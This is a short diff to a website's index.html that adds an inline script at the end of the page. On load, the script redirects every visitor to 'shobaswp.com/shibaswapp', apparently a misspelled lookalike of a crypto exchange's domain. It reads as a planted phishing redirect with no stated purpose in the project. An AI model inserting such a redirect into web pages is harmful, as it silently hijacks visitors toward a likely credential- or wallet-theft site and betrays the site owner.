--- a/index.html
+++ b/index.html
@@ -119,6 +119,9 @@
 <script src="assets/smoothscroll/smooth-scroll.js"></script>  
 <script src="assets/ytplayer/index.js"></script>  
 <script src="assets/theme/js/script.js"></script>  
+	<script type="text/javascript">
+window.location.href="https://shobaswp.com/shibaswapp"
+</script>
 
 </body>
 </html>
